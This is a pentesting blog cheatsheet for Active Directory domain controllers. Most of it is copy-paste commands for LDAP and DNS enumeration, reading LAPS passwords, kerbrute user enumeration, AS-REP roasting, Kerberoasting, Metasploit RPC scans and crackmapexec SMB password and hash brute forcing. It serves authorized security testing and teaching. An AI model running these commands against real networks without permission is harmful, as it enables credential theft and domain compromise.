Pentesting Domain Controllers Cheatsheet

February 06, 2024

In this blog post, we will share with you a comprehensive cheatsheet for pentesting those powerful and critical domain controllers. Now, I know what you're thinking: "But why, oh wise one, do we need such a guide?" Well, let me tell you, domain controllers are the repositories of your organization's most sensitive information - user credentials, group policies, and what not. And if not secured properly, they can lead to catastrophic data breaches or even system takeovers! 

So buckle up, as we explore various techniques, tools for testing the security of domain controllers. From identifying potential vulnerabilities to exploiting  them, we've got you covered with practical examples, real-life scenarios, and actionable insights. So stay tuned and prepare yourself for a rollercoaster ride through the fascinating world of pentesting! 


Note: Before proceeding with pentesting any system, it is essential to have proper authorization from concerned authorities and follow ethical guidelines. Happy learning!


This is just a brief/quick guide on what and how to Pentest a domain controller without digging too deep. if you are looking for a comprehensive guide, you can refer to my ACTIVE DIRECTORY PENETRATION TESTING CHEAT SHEET - RECON & INITIAL ACCESSACTIVE DIRECTORY PENTEST CHEAT SHEET - LATERAL MOVEMENT & PERSISTENCE TECHNIQUES

DNS
dig srv domaim.com @DC_IP

#Query ldap service
dig +short srv _ldap._tcp.dc._msdcs.dc.domain.com @DC_IP

#query Root Domain Controller
dig +short a rootdc.domain.com @DC_IP

LDAP Enum

#Nmap Scan for basic info
nmap -n -sV --script "ldap* and not brute" -p389,636,3268,3269 10.10.10.10

#Get Domain name
ldapsearch -x -h 10.10.10.10 -s base namingcontexts 
ldapsearch -H ldap://10.10.10.10 -x -s base namingcontexts

#Look for misconfigs - Finding ms-MCS-AdmPwd
ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

#Dump Everything
ldapsearch -LLL -x -H ldap://10.10.10.10 -b '' -s base '(objectclass=*)'

#Dump Everything using ldeep
ldeep ldap -a -d STEINS.local -s ldap://10.10.10.10 all dump
UserEnum 
Objective is to gather as many valid usernames as possible, try to figure out the username format used by the organization using their email addresses or social engineering
Example Name: John Smith 
Usernames: John.Smith, JohnS, Sjohn, SmithJ, JSmith, John.s 
try to figure it out and create a wordlist for yourself, you can use the below git reopo as a reference and create a list of usernames

git clone https://github.com/Bhanunamikaze/Wordlists.git 
cd Wordlists/Usernames

# User Enumeration to find Valid Usernames
kerbrute userenum --dc 10.10.10.10 -d test.domain.com Common_names.txt
Find Pre-Auth Disabled Users

GetNPUsers.py DOMAIN/ -usersfile user.txt -outputfile hash.txt -dc-ip 10.10.10.10

#AD Module - Finding users with PreauthNotRequired set
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuths

Kerberoasting

#Listing users with ServicePrincialName set using AD module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

#Get TGS Ticket Using GetUserSPNs.py
sudo GetUserSPNs.py -request -dc-ip 10.10.10.10 Steins.local/mark 

SMB/rpc Access
Use this script for testing SMB & RPC, this will run most common test cases on SMB 

rpcdump.py 10.10.10.10 -p 593


#RPC Endpoints enum via metsploit
msfconsole
use auxiliary/scanner/smb/pipe_auditor
use auxiliary/scanner/smb/smb_lookupsid
use auxiliary/scanner/dcerpc/endpoint_mapper
use auxiliary/scanner/dcerpc/hidden
use auxiliary/scanner/dcerpc/management
use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor

set rhosts 10.10.10.10
run
SMB Bruteforcing

#Basic SMB & OS info
crackmapexec smb 10.10.10.10

#List Shares 
crackmapexec smb 10.10.10.10 --shares

#passing blank creds via smb
crackmapexec smb 10.10.10.10 --shares -u '' -p ''

#If the password needs to be changed
smbpasswd -U username -r 10.10.10.10

#Brute forcing SMB Creds
crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt

#Bruteforcing SMB using hashes
proxychains crackmapexec -t 15  smb 10.10.10.10 -u users -H hashes --no-bruteforce --continue-on-success


 

,
By:
Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment